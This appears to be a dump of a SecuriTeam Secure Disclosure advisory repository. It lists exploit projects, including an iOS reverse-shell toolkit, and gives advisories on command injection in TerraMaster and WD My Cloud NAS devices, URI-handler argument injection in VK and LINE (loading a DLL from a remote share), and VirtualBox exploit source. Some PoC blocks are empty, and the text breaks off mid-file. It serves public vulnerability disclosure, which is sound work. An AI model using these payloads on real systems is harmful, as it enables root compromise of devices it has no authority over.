├── SSD Advisory - 3435 └── readme.md ├── SSD Advisory - 3602 └── readme.md ├── SSD Advisory - 3674 └── readme.md ├── SSD Advisory - 3676 └── readme.md ├── SSD Advisory - 3679 └── readme.md ├── SSD Advisory - 3681 └── readme.md ├── SSD Advisory - 3685 └── readme.md ├── SSD Advisory - 3686 └── readme.md ├── SSD Advisory - 3689 └── readme.md ├── SSD Advisory - 3700 └── readme.md ├── SSD Advisory - 3723 └── readme.md ├── SSD Advisory - 3724 └── readme.md ├── SSD Advisory - 3727 └── readme.md ├── SSD Advisory - 3731 └── readme.md ├── SSD Advisory - 3736 ├── exploit │ ├── poc_vrdpexploit │ │ ├── vrdpexploit.sln │ │ └── vrdpexploit │ │ │ ├── MyHGSMI.cpp │ │ │ ├── MyMain.cpp │ │ │ ├── MyMemoryMapper.cpp │ │ │ ├── VBoxMPCr.cpp │ │ │ ├── VBoxMPHGSMI.cpp │ │ │ ├── VBoxMPWddm.cpp │ │ │ ├── VBoxOGLgen │ │ │ ├── NULLfuncs.c │ │ │ ├── cr_gl.h │ │ │ ├── cr_opcodes.h │ │ │ ├── cr_packfunctions.h │ │ │ ├── cropengl.def │ │ │ ├── debug_opcodes.c │ │ │ ├── dispatch.c │ │ │ ├── errorspu.c │ │ │ ├── feedbackspu.c │ │ │ ├── feedbackspu_proto.h │ │ │ ├── feedbackspu_state.c │ │ │ ├── getprocaddress.c │ │ │ ├── glloader.c │ │ │ ├── pack_arrays_swap.c │ │ │ ├── pack_bbox.c │ │ │ ├── pack_bounds_swap.c │ │ │ ├── pack_bufferobject_swap.c │ │ │ ├── pack_client_swap.c │ │ │ ├── pack_clipplane_swap.c │ │ │ ├── pack_current.c │ │ │ ├── pack_fog_swap.c │ │ │ ├── pack_lights_swap.c │ │ │ ├── pack_materials_swap.c │ │ │ ├── pack_matrices_swap.c │ │ │ ├── pack_misc_swap.c │ │ │ ├── pack_pixels_swap.c │ │ │ ├── pack_point_swap.c │ │ │ ├── pack_program_swap.c │ │ │ ├── pack_regcombiner_swap.c │ │ │ ├── pack_stipple_swap.c │ │ │ ├── packer.c │ │ │ ├── packspu.c │ │ │ ├── packspu_beginend.c │ │ │ ├── packspu_flush.c │ │ │ ├── packspu_get.c │ │ │ ├── packspu_proto.h │ │ │ ├── passthroughspu.c │ │ │ ├── server_dispatch.c │ │ │ ├── server_dispatch.h │ │ │ ├── server_get.c │ │ │ ├── server_retval.c │ │ │ ├── server_simpleget.c │ │ │ ├── spu_dispatch_table.h │ │ │ ├── spuchange.c │ │ │ ├── spucopy.c │ │ │ 
├── state │ │ │ │ ├── cr_currentpointers.h │ │ │ │ └── cr_statefuncs.h │ │ │ ├── state_buffer_gen.c │ │ │ ├── state_current_gen.c │ │ │ ├── state_fog_gen.c │ │ │ ├── state_get.c │ │ │ ├── state_hint_gen.c │ │ │ ├── state_isenabled.c │ │ │ ├── state_lighting_gen.c │ │ │ ├── state_line_gen.c │ │ │ ├── state_multisample_gen.c │ │ │ ├── state_polygon_gen.c │ │ │ ├── state_regcombiner_gen.c │ │ │ ├── state_viewport_gen.c │ │ │ ├── tsfuncs.c │ │ │ ├── unpack.c │ │ │ ├── unpack_extend.h │ │ │ └── windows_exports.asm │ │ │ ├── _Constants.cpp │ │ │ ├── iprt │ │ │ └── nt │ │ │ │ └── nt.h │ │ │ ├── product-generated.h │ │ │ ├── version-generated.h │ │ │ ├── vrdpexploit.inf │ │ │ ├── vrdpexploit.vcxproj │ │ │ ├── vrdpexploit.vcxproj.filters │ │ │ └── vrdpexploit.vcxproj.user │ └── poc_vrdpexploit_launcher │ │ ├── hostid_hijacker │ │ ├── HostIdHijacker.c │ │ ├── ReflectiveDll.c │ │ ├── ReflectiveDllInjection.h │ │ ├── ReflectiveLoader.c │ │ ├── ReflectiveLoader.h │ │ ├── Shellcode.asm │ │ ├── hostid_hijacker.vcxproj │ │ ├── hostid_hijacker.vcxproj.filters │ │ └── hostid_hijacker.vcxproj.user │ │ ├── vrdpexploit_launcher.sln │ │ └── vrdpexploit_launcher │ │ ├── Driver.c │ │ ├── GetProcAddressR.c │ │ ├── GetProcAddressR.h │ │ ├── Inject.c │ │ ├── LoadLibraryR.c │ │ ├── LoadLibraryR.h │ │ ├── Main.c │ │ ├── Process.c │ │ ├── ReflectiveDLLInjection.h │ │ ├── _Constants.c │ │ ├── vrdpexploit_launcher.vcxproj │ │ ├── vrdpexploit_launcher.vcxproj.filters │ │ └── vrdpexploit_launcher.vcxproj.user └── readme.md ├── SSD Advisory - 3737 └── readme.md ├── SSD Advisory - 3743 └── readme.md ├── SSD Advisory - 3747 └── readme.md ├── SSD Advisory - 3751 └── readme.md ├── SSD Advisory - 3758 └── readme.md ├── SSD Advisory - 3759 └── readme.md ├── SSD Advisory - 3765 └── readme.md ├── SSD Advisory - 3766 └── readme.md ├── SSD Advisory - 3769 └── readme.md ├── SSD Advisory - 3778 └── readme.md ├── SSD Advisory - 3781 └── readme.md ├── SSD Advisory - 3783 └── readme.md ├── SSD Advisory - 3786 └── 
readme.md ├── SSD Advisory - 3796 └── readme.md ├── SSD Advisory - 3802 └── readme.md ├── SSD Advisory - 3814 └── readme.md ├── SSD Advisory - 3899 └── readme.md ├── SSD Advisory - 3904 └── readme.md ├── SSD Advisory - 3923 └── readme.md ├── SSD Advisory - 3926 └── readme.md ├── SSD Advisory - 3928 └── readme.md ├── SSD Advisory - 3944 ├── powend (code) │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ │ ├── AppIcon.appiconset │ │ │ └── Contents.json │ │ └── Contents.json │ ├── Base.lproj │ │ ├── LaunchScreen.storyboard │ │ └── Main.storyboard │ ├── Info.plist │ ├── ViewController.h │ ├── ViewController.m │ ├── code.h │ ├── main.m │ ├── mig.c │ ├── powend.entitlements │ └── uexploit.c ├── powend.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ ├── xcshareddata │ │ │ └── IDEWorkspaceChecks.plist │ │ └── xcuserdata │ │ │ └── simo.xcuserdatad │ │ │ └── UserInterfaceState.xcuserstate │ └── xcuserdata │ │ └── simo.xcuserdatad │ │ ├── xcdebugger │ │ └── Breakpoints_v2.xcbkptlist │ │ └── xcschemes │ │ └── xcschememanagement.plist ├── powendTests │ ├── Info.plist │ └── powendTests.m ├── powendUITests │ ├── Info.plist │ └── powendUITests.m └── readme.md ├── SSD Advisory - 3957 └── readme.md ├── SSD Advisory - 3980 └── readme.md ├── SSD Advisory - 3987 └── readme.md ├── SSD Advisory - 3991 ├── poc.c └── readme.md ├── SSD Advisory - 4002 ├── poc.c └── readme.md ├── SSD Advisory - 4007 ├── poc │ ├── avatar.png │ └── poc.php └── readme.md ├── SSD Advisory - 4033 ├── poc │ ├── id_xmss │ └── sshd_config └── readme.md ├── SSD Advisory - 4047 └── readme.md ├── SSD Advisory - 4066 ├── poc │ ├── IOKit.framework │ │ └── Versions │ │ │ └── A │ │ │ └── IOKit │ ├── ios_reverseshell │ ├── iospwn_typhoonPwn_2019.xcodeproj │ │ ├── project.pbxproj │ │ ├── project.xcworkspace │ │ │ ├── contents.xcworkspacedata │ │ │ └── xcuserdata │ │ │ │ └── aa.xcuserdatad │ │ │ │ └── UserInterfaceState.xcuserstate │ │ ├── xcshareddata │ │ │ └── 
xcschemes │ │ │ │ └── iospwn_typhoonPwn_2019.xcscheme │ │ └── xcuserdata │ │ │ └── aa.xcuserdatad │ │ │ ├── xcdebugger │ │ │ └── Breakpoints_v2.xcbkptlist │ │ │ └── xcschemes │ │ │ └── xcschememanagement.plist │ ├── iospwn_typhoonPwn_2019 │ │ ├── ALOA_exp.c │ │ ├── AppDelegate.h │ │ ├── AppDelegate.m │ │ ├── Assets.xcassets │ │ │ ├── AppIcon.appiconset │ │ │ │ └── Contents.json │ │ │ └── Contents.json │ │ ├── BNSA_exp.c │ │ ├── Base.lproj │ │ │ ├── LaunchScreen.storyboard │ │ │ └── Main.storyboard │ │ ├── IOKitKeys.h │ │ ├── IOKitLib.h │ │ ├── IOReturn.h │ │ ├── IOTypes.h │ │ ├── Info.plist │ │ ├── OSMessageNotification.h │ │ ├── UHAK_final_exp.c │ │ ├── ViewController.h │ │ ├── ViewController.m │ │ ├── inject.h │ │ ├── inject.m │ │ ├── kernel_stru.h │ │ ├── kernel_stu.c │ │ ├── main.m │ │ └── pwned.png │ └── reverseShell │ │ ├── bin │ │ ├── bash │ │ ├── cat │ │ ├── chmod │ │ ├── cp │ │ ├── date │ │ ├── dd │ │ ├── df │ │ ├── hostname │ │ ├── kill │ │ ├── launchctl │ │ ├── ln │ │ ├── ls │ │ ├── mkdir │ │ ├── mv │ │ ├── ps │ │ ├── pwd │ │ ├── rm │ │ ├── rmdir │ │ ├── sh │ │ ├── sleep │ │ ├── stty │ │ └── zsh │ │ ├── etc │ │ ├── profile │ │ └── zshrc │ │ ├── sbin │ │ ├── dmesg │ │ ├── ifconfig │ │ ├── kextunload │ │ ├── md5 │ │ ├── mknod │ │ ├── ping │ │ └── shutdown │ │ └── usr │ │ ├── .DS_Store │ │ ├── bin │ │ ├── arch │ │ ├── chflags │ │ ├── cut │ │ ├── du │ │ ├── false │ │ ├── find │ │ ├── fs_usage │ │ ├── grep │ │ ├── gunzip │ │ ├── gzip │ │ ├── head │ │ ├── hexdump │ │ ├── hostinfo │ │ ├── id │ │ ├── killall │ │ ├── less │ │ ├── login │ │ ├── lsmp │ │ ├── more │ │ ├── nano │ │ ├── nohup │ │ ├── passwd │ │ ├── plconvert │ │ ├── printf │ │ ├── renice │ │ ├── reset │ │ ├── sc_usage │ │ ├── scp │ │ ├── screen │ │ ├── script │ │ ├── sed │ │ ├── seq │ │ ├── split │ │ ├── sqlite3 │ │ ├── stat │ │ ├── syslog │ │ ├── tail │ │ ├── tar │ │ ├── tee │ │ ├── time │ │ ├── true │ │ ├── tset │ │ ├── uname │ │ ├── vim │ │ ├── vm_stat │ │ ├── wc │ │ ├── what │ │ ├── which │ │ ├── 
xargs │ │ └── xxd │ │ ├── local │ │ ├── .DS_Store │ │ ├── bin │ │ │ ├── dbclient │ │ │ ├── dropbear │ │ │ ├── dropbearconvert │ │ │ ├── dropbearkey │ │ │ ├── filemon │ │ │ ├── jtool │ │ │ ├── procexp │ │ │ └── wget │ │ └── lib │ │ │ ├── .DS_Store │ │ │ └── zsh │ │ │ ├── .DS_Store │ │ │ └── 5.0.8 │ │ │ ├── .DS_Store │ │ │ └── zsh │ │ │ ├── attr.so │ │ │ ├── cap.so │ │ │ ├── clone.so │ │ │ ├── compctl.so │ │ │ ├── complete.so │ │ │ ├── complist.so │ │ │ ├── computil.so │ │ │ ├── curses.so │ │ │ ├── datetime.so │ │ │ ├── deltochar.so │ │ │ ├── example.so │ │ │ ├── files.so │ │ │ ├── langinfo.so │ │ │ ├── mapfile.so │ │ │ ├── mathfunc.so │ │ │ ├── newuser.so │ │ │ ├── parameter.so │ │ │ ├── regex.so │ │ │ ├── socket.so │ │ │ ├── stat.so │ │ │ ├── system.so │ │ │ ├── tcp.so │ │ │ ├── termcap.so │ │ │ ├── terminfo.so │ │ │ ├── zftp.so │ │ │ ├── zle.so │ │ │ ├── zleparameter.so │ │ │ ├── zprof.so │ │ │ ├── zpty.so │ │ │ ├── zselect.so │ │ │ └── zutil.so │ │ ├── sbin │ │ ├── chown │ │ ├── ioreg │ │ ├── kextstat │ │ ├── ltop │ │ ├── netstat │ │ ├── nvram │ │ ├── sysctl │ │ └── taskpolicy │ │ └── share │ │ ├── .DS_Store │ │ └── terminfo │ │ ├── 61 │ │ ├── ansi │ │ ├── ansi+arrows │ │ ├── ansi+csr │ │ ├── ansi+cup │ │ ├── ansi+enq │ │ ├── ansi+erase │ │ ├── ansi+idc │ │ ├── ansi+idl │ │ ├── ansi+idl1 │ │ ├── ansi+inittabs │ │ ├── ansi+local │ │ ├── ansi+local1 │ │ ├── ansi+pp │ │ ├── ansi+rca │ │ ├── ansi+rep │ │ ├── ansi+sgr │ │ ├── ansi+sgrbold │ │ ├── ansi+sgrdim │ │ ├── ansi+sgrso │ │ ├── ansi+sgrul │ │ ├── ansi+tabs │ │ ├── ansi-color-2-emx │ │ ├── ansi-color-3-emx │ │ ├── ansi-emx │ │ ├── ansi-generic │ │ ├── ansi-m │ │ ├── ansi-mini │ │ ├── ansi-mono │ │ ├── ansi-mr │ │ ├── ansi-mtabs │ │ ├── ansi-nt │ │ ├── ansi.sys │ │ ├── ansi.sys-old │ │ ├── ansi.sysk │ │ ├── ansi43m │ │ ├── ansi77 │ │ ├── ansi80x25 │ │ ├── ansi80x25-mono │ │ ├── ansi80x25-raw │ │ ├── ansi80x30 │ │ ├── ansi80x30-mono │ │ ├── ansi80x43 │ │ ├── ansi80x43-mono │ │ ├── ansi80x50 │ │ ├── ansi80x50-mono 
│ │ ├── ansi80x60 │ │ ├── ansi80x60-mono │ │ ├── ansil │ │ ├── ansil-mono │ │ ├── ansis │ │ ├── ansis-mono │ │ ├── ansisysk │ │ └── ansiw │ │ ├── 73 │ │ ├── screen │ │ ├── screen+fkeys │ │ ├── screen-16color │ │ ├── screen-16color-bce │ │ ├── screen-16color-bce-s │ │ ├── screen-16color-s │ │ ├── screen-256color │ │ ├── screen-256color-bce │ │ ├── screen-256color-bce-s │ │ ├── screen-256color-s │ │ ├── screen-bce │ │ ├── screen-s │ │ ├── screen-w │ │ ├── screen.linux │ │ ├── screen.mlterm │ │ ├── screen.rxvt │ │ ├── screen.teraterm │ │ ├── screen.xterm-new │ │ ├── screen.xterm-r6 │ │ ├── screen.xterm-xfree86 │ │ ├── screen2 │ │ └── screen3 │ │ ├── 76 │ │ ├── vt100 │ │ ├── vt100+ │ │ ├── vt100+enq │ │ ├── vt100+fnkeys │ │ ├── vt100+keypad │ │ ├── vt100+pfkeys │ │ ├── vt100-am │ │ ├── vt100-bm │ │ ├── vt100-bm-o │ │ ├── vt100-bot-s │ │ ├── vt100-nam │ │ ├── vt100-nam-w │ │ ├── vt100-nav │ │ ├── vt100-nav-w │ │ ├── vt100-putty │ │ ├── vt100-s │ │ ├── vt100-s-bot │ │ ├── vt100-s-top │ │ ├── vt100-top-s │ │ ├── vt100-vb │ │ ├── vt100-w │ │ ├── vt100-w-am │ │ ├── vt100-w-nam │ │ ├── vt100-w-nav │ │ └── vt100nam │ │ ├── 78 │ │ └── xterm-256color │ │ ├── .DS_Store │ │ └── 6c │ │ ├── linux │ │ ├── linux-basic │ │ ├── linux-c │ │ ├── linux-c-nc │ │ ├── linux-koi8 │ │ ├── linux-koi8r │ │ ├── linux-lat │ │ ├── linux-m │ │ ├── linux-nic │ │ ├── linux-vt │ │ └── linux2.6.26 └── readme.md ├── SSD Advisory - 4099 └── readme.md ├── SSD Advisory - 4100 ├── POC │ └── Invoke-ExploitAnyConnectPathTraversal.psm1 └── readme.md ├── SSD Advisory - 4147 ├── POC │ ├── build.sh │ ├── fake_cryptodev.h │ ├── hack.c │ ├── package.sh │ ├── spray.c │ ├── spray.h │ └── test.sh └── readme.md ├── SSD Advisory – 3915 └── readme.md ├── license.md └── readme.md /SSD Advisory - 3602/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerability Summary**
2 | The following advisory describes an unauthenticated remote command execution vulnerability found in TerraMaster TOS 3.0.33. 3 | TOS is a “Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.” 4 | 5 | **Credit**
6 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. 7 | 8 | **Vendor response**
9 | The vendor stated that version 3.1.03 of TerraMaster TOS is no longer affected by this vulnerability. The latest version of the software can be obtained from: http://download.terra-master.com/download.php. 10 | 11 | **Vulnerability details**
12 | User-controlled input is not sufficiently filtered, and an unauthenticated user can execute commands as root by sending a POST request to http://IP/include/ajax/GetTest.php with the following parameters: 13 | 14 | * dev=1 15 | * testtype=;COMMAND-TO-RUN; 16 | * submit=Send 17 | 18 | We can see in the source code that the value of the testtype parameter is concatenated into $line, which is then placed into the command string executed by shell_exec(). In the snippet below, neither dev nor testtype is validated or passed through escapeshellarg() before it reaches the shell. 19 | 20 | ```php 21 | $file = "/mnt/base/.".basename($data['dev'])."test"; 22 | if(!file_exists($file)) touch($file); 23 | if(isset($data['testtype'])){//开始或者停止过程... 24 | if($data['testtype'] != 'stop'){ 25 | $line = $data['dev'].':'.$data['testtype'].":".time(); 26 | shell_exec("echo -e \"".$line."\" > $file"); 27 | } 28 | $return = smartscan($data['dev'],$data['testtype']); 29 | }else{//得到状态过程... 30 | $return = smartscan($data['dev']); 31 | } 32 | ``` 33 | 34 | **Proof of Concept**
35 | ```html 36 |
37 | 38 | 39 | 40 |
41 | ``` 42 | -------------------------------------------------------------------------------- /SSD Advisory - 3674/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerability Summary**
2 | The following describes a vulnerability in VK Messenger that is triggered through an improperly handled URI. 3 | VK (VKontakte; [..], meaning InContact) is “an online social media and social networking service. It is available in several languages. VK allows users to message each other publicly or privately, to create groups, public pages and events, share and tag images, audio and video, and to play browser-based games. It is based in Saint Petersburg, Russia”. 4 | 5 | **Credit**
6 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. 7 | 8 | **Affected Version**
9 | VK Messenger version 3.1.0.143 10 | 11 | **Vendor Response**
12 | The vendor responded that the problem no longer affects the latest version – but didn’t provide any information on when it was fixed and whether it was fixed due to someone else reporting this vulnerability. 13 | 14 | **Vulnerability Details**
15 | The VK Messenger, which is part of the VK package, registers a URI handler on Windows in the following way: 16 | 17 | ``` 18 | [HKEY_CLASSES_ROOT\vk] 19 | "URL Protocol"="" 20 | @="URL:vk" 21 | [HKEY_CLASSES_ROOT\vk\shell] 22 | [HKEY_CLASSES_ROOT\vk\shell\open] 23 | [HKEY_CLASSES_ROOT\vk\shell\open\command] 24 | @="\"C:\\Program Files\\VK\\vk.exe\" \"%1\"" 25 | ``` 26 | 27 | When the browser hands a `vk://` URI to this handler, the URI is substituted for `%1` on the vk.exe command line. Because the application does not properly parse that argument, it is possible to inject arbitrary command line parameters for vk.exe. It is possible to inject the ‘–gpu-launcher=’ parameter to execute arbitrary commands. It is also possible to inject the ‘–browser-subprocess-path=’ parameter to execute arbitrary commands. Network share paths are allowed, too.
28 | Example of attack encoded in HTML entity: 29 | 30 | `` 31 | 32 | When opening a malicious page, a notification box asks the user to open VK. 33 | NOTE: The application is not in the auto-startup items, and the issue will work if the application is not already started. 34 | -------------------------------------------------------------------------------- /SSD Advisory - 3679/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerability Summary**
2 | A vulnerability in the Western Digital My Cloud Pro Series PR2100 allows authenticated users to execute arbitrary commands. 3 | 4 | **Credit**
5 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. 6 | 7 | **Vendor Response**
8 | The vendor was notified on the 28th of November 2017 and responded that they take security seriously and will be fixing this vulnerability promptly. Repeated attempts to get a timeline or a fix failed; the last update received from them was on the 31st of Jan 2018, and no further emails sent to the vendor were answered. We are not aware of any fix or remediation for this vulnerability. 9 | 10 | **Vulnerability Details**
11 | In detail, due to a logic flaw, with a forged HTTP request it is possible to bypass the authentication for HTTP basic and HTTP digest login types. 12 | Log into the web application using a low privilege user, once the main page loads, find in burp proxy history for a request to `/cgi-bin/home_mgr.cgi` 13 | 14 | ``` 15 | POST /cgi-bin/home_mgr.cgi HTTP/1.1 16 | Host: 10.10.10.193 17 | Content-Length: 25 18 | Accept: application/xml, text/xml, */*; q=0.01 19 | Origin: http://10.10.10.193 20 | X-Requested-With: XMLHttpRequest 21 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 22 | (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 23 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 24 | Referer: http://10.10.10.193/ 25 | Accept-Language: ko,en-US;q=0.8,ko-KR;q=0.6,en;q=0.4 26 | Cookie: PHPSESSID=650fda9b5fe3a35a5315d85bf929b247; fw_version=2.30.165; usern 27 | ame=abcd; local_login=1; isAdmin=0 28 | Connection: close 29 | cmd=7&f_user=abcd$(reboot) 30 | ``` 31 | 32 | The last line can be replaced with:
33 | `cmd=7&f_user=abcd$(ping x.x.x.x)` 34 | 35 | Or:
36 | `cmd=7&f_user=abcd$(mkdir /tmp/nshctest)` 37 | 38 | This means you can run any Linux command and it would execute. But there will be no feedback in the response. 39 | -------------------------------------------------------------------------------- /SSD Advisory - 3724/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerabilities Summary**
2 | LINE for Windows, provided by LINE Corporation, specifies the path from which DLLs are read when the software is launched. When a user clicks on a specially crafted link, an attacker can use this vulnerability to make the application insecurely load an arbitrary DLL, which can lead to arbitrary code execution. 3 | 4 | **Vendor Response**
5 | “We released version 5.8.0 of the modified version LINE PC version (Windows version) on May 31, 2018, and we have automatically updated for all users. The update will be applied automatically on the system side when using the product. Also, when installing the LINE PC version (Windows version) from now on please use the latest installer”. 6 | 7 | **CVE**
8 | CVE-2018-0609 9 | 10 | **Credit**
11 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. 12 | 13 | **Affected systems**
14 | LINE for Windows before version 5.8.0 15 | 16 | **Vulnerability Details**
17 | When processing ‘line:’ or ‘lineb:’ URIs, it is possible to pass arbitrary command line parameters to LINE.exe, because the application does not properly parse URIs that use these schemes. In addition, the ‘-platformpluginpath’ parameter supports network share paths. Using this parameter an attacker can cause the application to remotely load a Qt (https://www.qt.io/) DLL library from the network share, found inside the sub-path /imageformats. 18 | 19 | **PoC**
20 | 21 | ```html 22 | contact me
23 | contact me 2 24 | ``` 25 | 26 | It works with an iframe too. 27 | 28 | ```html 29 | 30 | ``` 31 | 32 | It could be also exploited locally through an .url ‘file:’, for example, creating an internet shortcut file with the next content: 33 | 34 | ```batch 35 | [InternetShortcut] 36 | URL=line://?" -platformpluginpath \\192.168.0.1\uncshare -- 37 | ``` 38 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27130.2027 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vrdpexploit", "vrdpexploit\vrdpexploit.vcxproj", "{93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|ARM64 = Debug|ARM64 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|ARM = Release|ARM 15 | Release|ARM64 = Release|ARM64 16 | Release|x64 = Release|x64 17 | Release|x86 = Release|x86 18 | EndGlobalSection 19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 20 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.ActiveCfg = Debug|ARM 21 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.Build.0 = Debug|ARM 22 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.Deploy.0 = Debug|ARM 23 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.ActiveCfg = Debug|ARM64 24 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.Build.0 = Debug|ARM64 25 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.Deploy.0 = Debug|ARM64 26 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.ActiveCfg = Debug|x64 27 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.Build.0 = Debug|x64 28 | 
{93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.Deploy.0 = Debug|x64 29 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.ActiveCfg = Debug|x64 30 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.Build.0 = Debug|x64 31 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.Deploy.0 = Debug|x64 32 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.ActiveCfg = Release|ARM 33 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.Build.0 = Release|ARM 34 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.Deploy.0 = Release|ARM 35 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.ActiveCfg = Release|ARM64 36 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.Build.0 = Release|ARM64 37 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.Deploy.0 = Release|ARM64 38 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.ActiveCfg = Release|x64 39 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.Build.0 = Release|x64 40 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.Deploy.0 = Release|x64 41 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.ActiveCfg = Release|Win32 42 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.Build.0 = Release|Win32 43 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.Deploy.0 = Release|Win32 44 | EndGlobalSection 45 | GlobalSection(SolutionProperties) = preSolution 46 | HideSolutionNode = FALSE 47 | EndGlobalSection 48 | GlobalSection(ExtensibilityGlobals) = postSolution 49 | SolutionGuid = {9CAAF34D-70C5-431B-BB32-47E116148B13} 50 | EndGlobalSection 51 | EndGlobal 52 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/MyMemoryMapper.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | NTSTATUS 4 | MyMapPhysicalToVirtual(PVOID* virtOut, PHYSICAL_ADDRESS phys, PHYSICAL_ADDRESS physLen) { 5 | NTSTATUS Status = STATUS_UNSUCCESSFUL; 6 | UNICODE_STRING unicodeStr; 7 | 
OBJECT_ATTRIBUTES objAttr; 8 | HANDLE physMemHandle; 9 | 10 | RtlInitUnicodeString(&unicodeStr, L"\\Device\\PhysicalMemory"); 11 | InitializeObjectAttributes( 12 | &objAttr, 13 | &unicodeStr, 14 | OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, 15 | (HANDLE)NULL, 16 | (PSECURITY_DESCRIPTOR)NULL); 17 | 18 | // Open a handle to the physical-memory section object. 19 | if ((Status = ZwOpenSection(&physMemHandle, SECTION_ALL_ACCESS, &objAttr)) != STATUS_SUCCESS) { 20 | return Status; 21 | } 22 | 23 | PVOID virt = NULL; 24 | Status = ZwMapViewOfSection( 25 | physMemHandle, 26 | NtCurrentProcess(), 27 | &virt, 28 | 0L, 29 | (ULONG_PTR)physLen.QuadPart, 30 | &phys, 31 | (PULONG_PTR)(&(physLen.QuadPart)), 32 | ViewUnmap, 33 | 0, 34 | PAGE_READWRITE | PAGE_WRITECOMBINE); 35 | if (Status != STATUS_SUCCESS) { 36 | return Status; 37 | } 38 | 39 | *virtOut = virt; 40 | ZwClose(physMemHandle); 41 | return STATUS_SUCCESS; 42 | } 43 | 44 | NTSTATUS 45 | MyUnmapVirtual(PVOID virt) { 46 | return ZwUnmapViewOfSection(NtCurrentProcess(), virt); 47 | } 48 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_bounds_swap.c: -------------------------------------------------------------------------------- 1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_bounds.c BY pack_swap.py */ 2 | 3 | 4 | /* Copyright (c) 2001, Stanford University 5 | * All rights reserved 6 | * 7 | * See the file LICENSE.txt for information on redistributing this software. 8 | */ 9 | 10 | #include "packer.h" 11 | #include "cr_opcodes.h" 12 | #include "cr_mem.h" 13 | 14 | void PACK_APIENTRY crPackBoundsInfoCRSWAP( CR_PACKER_CONTEXT_ARGDECL const CRrecti *bounds, const GLbyte *payload, GLint len, GLint num_opcodes ) 15 | { 16 | CR_GET_PACKER_CONTEXT(pc); 17 | /* Don't get the buffered_ptr here because we've already 18 | * verified that there's enough space for everything. 
